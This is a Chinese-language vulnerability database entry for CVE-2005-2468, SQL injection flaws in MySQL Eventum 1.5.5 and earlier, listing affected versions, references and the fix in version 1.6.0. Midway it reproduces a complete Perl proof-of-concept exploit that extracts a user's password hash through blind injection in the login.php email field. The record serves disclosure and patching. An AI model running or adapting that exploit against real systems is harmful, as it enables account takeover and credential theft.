CVE-2005-2468
CVSS6.4
发布时间 :2005-12-31 00:00:00
修订时间 :2016-10-17 23:27:38
NMCOE    

[原文]Multiple SQL injection vulnerabilities in MySQL Eventum 1.5.5 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) isCorrectPassword or (2) userExist function in class.auth.php, getCustomFieldReport function in (4) custom_fields.php, (5) custom_fields_graph.php, or (6) class.report.php, or the insert function in (7) releases.php or (8) class.release.php.


[CNNVD]MySQL Eventum多个SQL注入漏洞(CNNVD-200512-1003)

        MySQL Eventum 1.5.5及更早版本存在多个SQL注入漏洞,远程攻击者可以通过在class.auth.php内的(1)isCorrectPassword或者(2)userExist函数,在(4)custom_fields.php,(5)custom_fields_graph.php或(6)class.report.php中的getCustomFieldReport 函数,或者(7)releases.php或(8)class.release.php中insert函数,执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:mysql:eventum:1.4MySQL Eventum MySQL Eventum 1.4
cpe:/a:mysql:eventum:1.3MySQL Eventum MySQL Eventum 1.3
cpe:/a:mysql:eventum:1.2MySQL Eventum MySQL Eventum 1.2
cpe:/a:mysql:eventum:1.5.4MySQL Eventum MySQL Eventum 1.5.4
cpe:/a:mysql:eventum:1.1MySQL Eventum MySQL Eventum 1.1
cpe:/a:mysql:eventum:1.5.5MySQL Eventum MySQL Eventum 1.5.5
cpe:/a:mysql:eventum:1.2.2MySQL Eventum MySQL Eventum 1.2.2
cpe:/a:mysql:eventum:1.3.1MySQL Eventum MySQL Eventum 1.3.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2468
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2468
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-1003
(官方数据源) CNNVD

- 其它链接及资源

http://lists.mysql.com/eventum-users/2072
(PATCH)  CONFIRM  http://lists.mysql.com/eventum-users/2072
http://marc.info/?l=bugtraq&m=112292193807958&w=2
(UNKNOWN)  BUGTRAQ  20050731 MySQL Eventum Multiple Vulnerabilities
http://securitytracker.com/id?1014603
(PATCH)  SECTRACK  1014603
http://www.gulftech.org/?node=research&article_id=00093-07312005
(UNKNOWN)  MISC  http://www.gulftech.org/?node=research&article_id=00093-07312005
http://www.securityfocus.com/bid/14437
(UNKNOWN)  BID  14437
http://www.vupen.com/english/advisories/2005/1287
(UNKNOWN)  VUPEN  ADV-2005-1287

- 漏洞信息

MySQL Eventum多个SQL注入漏洞
中危 SQL注入
2005-12-31 00:00:00 2006-06-08 00:00:00
远程  
        MySQL Eventum 1.5.5及更早版本存在多个SQL注入漏洞,远程攻击者可以通过在class.auth.php内的(1)isCorrectPassword或者(2)userExist函数,在(4)custom_fields.php,(5)custom_fields_graph.php或(6)class.report.php中的getCustomFieldReport 函数,或者(7)releases.php或(8)class.release.php中insert函数,执行任意SQL命令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://dev.mysql.com/get/Downloads/eventum/eventum-1.6.0.tar.gz/from/pick

- 漏洞信息 (1134)

MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit (EDBID:1134)
php webapps
2005-08-05 Verified
0 James Bercegay
N/A [点击下载]
#!/usr/bin/perl -w
use IO::Socket;
use strict;

print "#################################\n";
print "#  MySQL Eventum <= v1.5.5 SQL Injection PoC  #\n";
print "#   James Bercegay // gulftech.org // 7-28-05      #\n";
print "#################################\n";

my $host = 'localhost';
my $path = '/eventum/login.php';
my $user = '2';
my $port = 80;
my $pass = '';

my @char = ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');

print "[*] Trying $host\n";

OUTER: for ( my $i = 1; $i < 33; $i++ ) 
{
INNER: for ( my $j=0; $j < 16; $j++ )
{
my $used = $char[$j];
my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die "[!] Unable to connect to $host\n";

my $post = "cat=login&url=&email=%27+UNION+SELECT+%273355d92c04a3332339b767f9278405ff%27+FROM+eventum_user+WHERE+usr_id=$user+AND+MID(usr_password,$i,1)='$used'%2F*&passwd=dance&Submit=Login";
my $send = "POST $path HTTP/1.1\r\n";
$send .= "Host: $host\r\n";
$send .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6\r\n";
$send .= "Connection: Keep-Alive\r\n";
$send .= "Content-type: application/x-www-form-urlencoded\r\n"; 
$send .= "Content-length: ".length($post)."\r\n\r\n";
$send .= "$post\r\n\r\n";

print $sock $send;

while ( my $line = <$sock> )
{
if ( $line =~ /(.*)err=7(.*)/is )
{
$pass .= $used;
print "[+] Char $i is $used\n";
last INNER;
} 
#/if
}
#/while

close($sock);
}
#/for INNER

if ( length($pass) < 1 ) 
{
print "[!] Host not vulnerable!";
exit;
}
}
#/for OUTER

print "[+] Pass hash is $pass\n";
exit;

# milw0rm.com [2005-08-05]
		

- 漏洞信息

18403
MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

MySQL Eventum contains a flaw that may allow a remote attacker to carry out an SQL injection attack and bypass authentication settings. The issue is due to the 'login.php' script not properly sanitizing user-supplied input to the 'email' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database to bypass authentication.

- 时间线

2005-07-31 Unknow
2005-07-31 Unknow

- 解决方案

Upgrade to version 1.6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站